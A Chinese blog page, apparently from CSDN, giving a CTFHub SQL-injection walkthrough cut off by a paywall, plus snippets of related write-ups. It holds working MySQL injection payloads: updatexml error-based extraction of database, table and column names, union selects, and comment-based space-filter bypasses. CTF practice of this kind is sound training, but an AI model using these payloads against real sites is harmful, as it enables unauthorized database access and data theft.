CTFHub——SQL注入

已于 2022-05-07 21:30:36 修改
阅读量1.4k 收藏 1
点赞数 1
分类专栏: 数据库 文章标签: sql 数据库 安全
于 2022-05-05 22:00:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Aquarius_ego/article/details/124595322
版权

目录

报错注入

布尔盲注

时间盲注

MySQL结构

Cookie注入

UA注入

Refer注入

过滤空格

附上链接:CTFHub

报错注入

按照它的提示:输入1

尝试闭合

输入1'

发现报错

判断几列

 

查询数据库

1 union select updatexml(1,concat(0x7e,database(),0x7e),1); #

查询表名

1 union select updatexml(1,concat(0x7e,(select(group_concat(table_name))from information_schema.tables where table_schema="sqli"),0x7e),1); # 

查询列名

1 union select updatexml(1,concat(0x7e, (select(group_concat(column_name))from information_schema.columns where table_name="flag") ,0x7e),1); #

最低0.47元/天 解锁文章
Aquarius_ego
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTFHub 技能树 之 SQL注入
滚滚是只小狐狸
03-05 1045
标题CTFHub 技能树 之SQL注入 进入CTFHub官网 一:SQL整数型注入 开题出现的界面是这样的,根据提示输入 1 后,出现两处回显,这里可以使用 工具注入也可以使用手工注入。 手工注入可以看一下这个博主写的查看手工注入 如果想了解工具的话就继续往下看吧☺ 我使用的是 kali 自带的 sqlmap 工具 1)因为一开始我们就已经知道存在注入点,于是这个步骤可有可无,但是还是可以看看数...
Js过滤空格的实现代码
10-27
Js空格过滤代码,这个实用性很强,可以省去用动态语言过滤字符的麻烦,减轻服务器压力,而且JS执行速度较快
CTFhub-sql注入-绕过空格过滤
ssss39的博客
08-19 372
如果1/**/union/**/select/**/1=1的显示结果与1/**/union/**/select/**/1=2的显示结果不一样,1/**/union/**/select/**/1,2 没有将数据带出来。3 没有回显,说明只用 1,2 这两个。与1的结果一样说明存在注入点。字段名dzkctujmta。
CTFHub SQL注入
最新发布
2302_81010533的博客
04-03 991
SQL注入是指攻击者通过在应用程序的输入中插入恶意的SQL代码,从而绕过应用程序的验证和过滤机制,进而执行非法的数据库操作。攻击者可以通过SQL注入获取敏感信息、修改数据甚至控制整个数据库
CTFHUBsql注入(特详解)
小宇的web博客
06-16 2637
CTFHUBsql注入 1.整数型注入 1.这里我使用的是Hackbar来进行sql注入,首先先判断有没有注入漏洞 加单引号 去掉‘加上and 1=1发现出现了回显 将1=1变为1=2,语句正确但是无法访问数据库 这里可以判定这里存在数字注入漏洞 2.接下来判断字段数量 这里输入id=1 order by 2看是否字段数量是否是2个 3.查询SQL语句插入位置 这里使用联合查询,查询库名。可以在data库中插入sql语句,也就是2的位置 4.获取数据库库名 1)获取当前数据库库名,数据库的名称为
CTFHub-sql注入
qq_60905276的博客
01-30 5644
1.整数型注入 先判断有没有注入点 ?id=1 and 1=1 ?id=1 and 1=2 证明有注入点 在输入1看看。 有回显。
CTFHub_技能树_Web之SQL注入——过滤空格
Ho1aAs‘s Blog
12-23 953
文章目录一、过滤空格的绕过二、注入过程Ⅰ、爆表名Ⅱ、爆列名Ⅲ、爆flag 一、过滤空格的绕过 一般注入语句为 ?id=0 union select database(),user() 由于过滤了空格致使无法执行注入的语句时,可使用以下字符代替空格,发挥同样效果 ():一对圆括号 +:加号 %09:TAB换行符的URL编码形式 /**/:块注释符 二、注入过程 依次尝试发现只能使用块注释符替换,那么开始注入: Ⅰ、爆表名 ?id=10/**/union/**/select/**/1,group_conc
CTFHUB-SQL注入
m_de_g的博客
08-11 5440
** CTFHUB-SQL注入 ** 一、SQl注入的基础 1.介绍SQL注入 SQL注入就是指WEB应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数代入数据库查询,攻击者可以通过构造不同的SQL语句来是实现对数据库的任意操作。 一般情况下,开发人员可以使用动态SQL语句创建通用、灵活的应用。动态SQL语句是在执行过程中构造的,他根据不同的条件产生不同的SQL语句。当开发人员在运行过程中需要根据不同的查询标准决定提取什么字段(如select语句),或者根据不同的条件选择不同
ctfhub SQL注入
mrwangtw的博客
09-03 300
整数型注入 (1)判断是否存在注入 1)加单引号 2)加and 1=1 3)加and 1=2 (2)查询字段 id=1 order by 2如果返回和id=1一样的结果,则order by 3,如果返回值与id=1时不同,那么字段就是2个 (3)查询SQL语句插入位置 ?id=-1 union select 1,2;查看结果 (4)获取数据库名 获取当前数据库 ?id=-1 union select 1,database() 获取所有数据库 ?id=-1 union se.
CTFHub(SQL注入)
cxiaodi的博客
05-09 1247
CTFHubSQL注入专题)
ctfhub_sql注入
lyy0xfff的博客
07-27 302
CTFHub-SQL注入 文章目录CTFHub-SQL注入整数型注入字符型注入报错注入布尔盲注时间盲注MySQL结构Cookie注入过滤空格UA注入Refer注入 整数型注入 由题意输入1,可以看到回显位置有两个,所以猜解有两列。 1 order by 3 1 order by 2 可以得知为2列,开始爆破数据 数据库、用户名 表名 -1 union select 1,(select group_concat(table_name) from information_schema.tables wh
啊D——SQL注入工具
12-01
啊D注入工具
打造网站的坚盾——SQL注入防范专题——SQL注入防范之完善网站程序.pdf
09-19
打造网站的坚盾——SQL注入防范专题——SQL注入防范之完善网站程序.pdf
PHP——SQL注入测试靶场
05-27
利用PHP写的SQL注入靶场。可参考博客 https://blog.csdn.net/realmels/article/details/117338077
SQL注入——mssql注入
01-19
可以在 SQL Server 中执行任何活动。 serveradmin  可以设置服务器范围的配置选项,关闭服务器。 setupadmin 可以管理链接服务器和启动过程,并执行某些系统存储过程(sp_...
ctf小经验sql注入
04-11
sql注入一、找到注入点; 二、判断当前表的字段; 三、用联合语句查看哪几位是有效位; 四、查看当前数据库中有哪些表; 五、查看表中有哪些属性;
CTFHUB|SQL注入sqlmap)
m0_60651303的博客
07-14 1121
差不多学了4天的SQL手工注入,学习一下sqlmap的使用,用工具偷偷懒。但等级越高,其速度越慢。一定要在时间内跑出来,要不然过期了就跑不出来了。1、顾名思义,要拿到cookie值。2、需要设置level至少为2。UA注入用--level 3。2、找数据库里面的表。4、爆破列里面的内容。过程中都会有五个选择。
CTFHUB-web-SQL注入
ookami6497的博客
11-29 714
CTFHUB SQL
CTFHub-SQL注入
yuqie的博客
06-13 868
当传入的ID参数为and 1=2时,由于1=2不成立,所以返回假,页面就会返回与id=1不同的结果。需要注意的是,当level默认为1的时候,默认不扫cookie的内容,必须是level大于等于2才能扫cookie里的内容,所以这里选用level 2.很明显,直接使用rand函数每次产生的数值不一样,但当我们提供了一个固定的随机数的种子0之后,每次产生的值都是相同的,这也可以称之为伪随机。配合上floor函数就可以产生确定的两个数,即0和1并且结合固定的随机种子0,它每次产生的随机数列都是相同的值。
ctfhub sql注入
10-09
CTFHub是一个CTF(Capture The Flag)竞赛平台,其中包含了各种类型的安全挑战,包括SQL注入SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以利用它来绕过应用程序的身份验证、访问未授权的数据或执行恶意操作...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值